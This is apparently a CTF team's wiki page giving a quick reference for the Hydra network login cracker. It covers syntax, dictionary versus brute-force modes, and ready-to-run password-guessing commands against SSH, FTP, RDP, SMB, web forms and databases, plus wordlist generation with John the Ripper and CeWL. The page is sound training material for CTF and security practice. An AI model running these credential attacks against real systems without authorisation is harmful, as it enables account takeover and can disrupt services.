Toggle search
Toggle menu
6
11
66
Brunnerne
Toggle preferences menu
Toggle personal menu
Not logged in
Your IP address will be publicly visible if you make any edits.

Hydra

From Brunnerne
More actions
Revision as of 10:56, 4 August 2025 by The.mikkel (talk | contribs) (Created page with "'''Hydra''', often referred to as '''thc-hydra''', is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax. == Core Syntax == The basic structure of a Hydra command is: <code>hydra [options] [[//service] | [service://]]<target>[:<port>]</code> The most critical options define the credential lists: * '''<code>-l <USE...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Hydra, often referred to as thc-hydra, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.

Core Syntax

The basic structure of a Hydra command is: hydra [options] [[1] | [service://]]<target>[:<port>]

The most critical options define the credential lists:

  • -l <USER>: Specifies a single username.
  • -L <FILE>: Specifies a file containing a list of usernames.
  • -p <PASS>: Specifies a single password.
  • -P <FILE>: Specifies a file containing a list of passwords.
  • -C <FILE>: Colon-separated file format, e.g., "user:pass". Useful if you have paired credentials to test against multiple hosts.
  • -x <MIN:MAX:CHARSET>: Brute-force generation. E.g. -x 1:3:aA1 to try all 1-3 character combinations of lowercase, uppercase, and numbers.

Attack Modes: Dictionary vs. Brute-Force

Hydra supports two main attack methodologies. Understanding the difference is key to using the tool effectively.

Dictionary Attack (Most Common)

A dictionary attack uses a predefined list of potential passwords (a "wordlist" or "dictionary"). This is the most common and efficient way to use Hydra, as it focuses on likely passwords. The quality of your wordlist is the most important factor for success. All commands using the -P or -C flags are performing a dictionary attack. 

# This is a dictionary attack using the rockyou.txt wordlist.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10

Pure Brute-Force Attack

A pure brute-force attack systematically tries every possible combination of characters for a given length and character set. This is extremely slow and only practical for very short or simple passwords (e.g., 4-digit PINs). This mode is enabled with the -x flag. 

# Tries to find a 4-digit numeric PIN for the user 'root'
hydra -l root -x 4:4:%d ssh://10.10.10.10

# Tries all 1 to 3 character lowercase passwords
hydra -l user -x 1:3:%a telnet://10.10.10.10
  • Note on Charsets: %d = digits, %a = lowercase letters, %A = uppercase letters.

Common Command Flags

These flags are used in almost all scenarios to control Hydra's behavior.

  • -t <TASKS>: Number of parallel connections (threads). Default is 16. For CTFs, a higher number like -t 64 is common, but be careful not to DoS the service.
  • -V: Verbose mode. Shows every attempt.
  • -d: Debug mode. Even more verbose.
  • -f or -F: Stop after finding the first valid credential pair. Crucial for speed in CTFs.
  • -o <FILE>: Output found credentials to a file.
  • -s <PORT>: Specify a non-default port for the service.
  • -w : Set a maximum time to wait for a response (in seconds).

Protocol-Specific Examples

Below are common commands for services frequently encountered in challenges. We'll assume common wordlists like /usr/share/wordlists/rockyou.txt.

SSH (ssh)

# Single user, password list
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.1.23

# User list, single password
hydra -L users.txt -p 'password123' 10.10.1.23 ssh

# User list, password list, on a non-standard port
hydra -L users.txt -P passwords.txt -t 64 -f -s 2222 10.10.1.23 ssh

FTP (ftp)

# Check for anonymous login
hydra -l anonymous -p '' ftp://192.168.1.5

# Brute-force with user and password lists
hydra -L users.txt -P pass.txt ftp://192.168.1.5 -t 32 -f

Telnet (telnet)

# Brute-force a telnet service
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.12.110.8 telnet

SMB (smb)

# Brute-force Windows SMB shares
# Note: For SMB, the target is often specified with a /// prefix
hydra -L users.txt -P passwords.txt smb://10.10.14.2

RDP (rdp)

# Brute-force a Remote Desktop Protocol service
hydra -L usernames.list -P rockyou.txt rdp://10.20.30.40 -f

HTTP Basic Authentication

# Brute-force a directory protected by .htaccess
hydra -L users.txt -P pass.txt 192.168.5.15 http-get /admin

HTTP POST Form

This is one of the most common web challenges. You need to inspect the login form to find the parameters.

  1. Step 1: Inspect the form. Go to the login page, open browser developer tools (F12), and look at the Network tab when you submit a failed login. Find the POST request and its Form Data.
  2. Let's say you find:
  3. * Login page: /login.php
  4. * Username field name: uname
  5. * Password field name: pword
  6. * Failure message on the page: Invalid Credentials or Login failed
  1. Step 2: Craft the Hydra command.
  2. The syntax is: http-post-form "<login_page>:<form_parameters>:<failure_message>"
  3. Use ^USER^ and ^PASS^ as placeholders.
# Example command
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login.php:uname=^USER^&pword=^PASS^:F=Invalid Credentials" -V -f
  • Pro Tip: If the failure condition is a redirect (HTTP 302) or a success cookie, the syntax changes slightly.
    • On success redirect to /dashboard.php: S=Location: /dashboard.php
    • On success set cookie "sessionID": S=sessionID

Database Services

PostgreSQL (postgres)

# Brute-force PostgreSQL. Default user is often 'postgres'.
hydra -l postgres -P passwords.txt 127.0.0.1 postgres

MySQL (mysql)

# Brute-force MySQL/MariaDB. Default user is often 'root'.
hydra -l root -P passwords.txt 127.0.0.1 mysql

CTF Tips & Best Practices

  • Leveraging Password Hints (Rule-Based Attacks): CTFs often provide hints (e.g., a pet's name, a birth year, a company name). These are not passwords themselves, but "base words". You can use tools like John the Ripper (JtR) or Hashcat to apply mutation rules (mangling) to these base words to generate a powerful, custom password list.
  1. Step 1: Create a file (e.g., hints.txt) with your base words, one per line.
    Step 2: Use JtR's --stdout mode to generate variations and save them to a new file.
# This command takes your hint words and applies common password rules (like adding '123', '!', etc.)
john --wordlist=hints.txt --rules=All --stdout > mangled_list.txt
  1. Step 3: Use this new, highly-targeted list with Hydra.
hydra -l someuser -P mangled_list.txt ssh://10.10.10.10
  • Website Wordlists: If the target is a company website, use a tool like CeWL to crawl the site and create a wordlist from its content. This can reveal project names, employee names, and other potential password components.
cewl http://ctf.target.corp -d 2 -w custom_words.txt
  • Start with defaults: Before launching a massive brute-force, always check for default credentials (e.g., admin:admin, root:password, test:test) and anonymous/guest access.
  • Use -f / -F: In a CTF, you usually only need one set of valid credentials. Use this flag to stop Hydra as soon as it finds one to save valuable time.
  • Task Management (-t): A high task count is faster but can also lock you out or crash a fragile service. If you get lots of errors, try lowering the task count. Start with -t 16 and increase if the service seems stable.

See Also

Retrieved from "https://wiki.brunnerne.dk/index.php?title=Hydra&oldid=66"
Last modified
This page was last edited on 4 August 2025, at 10:56.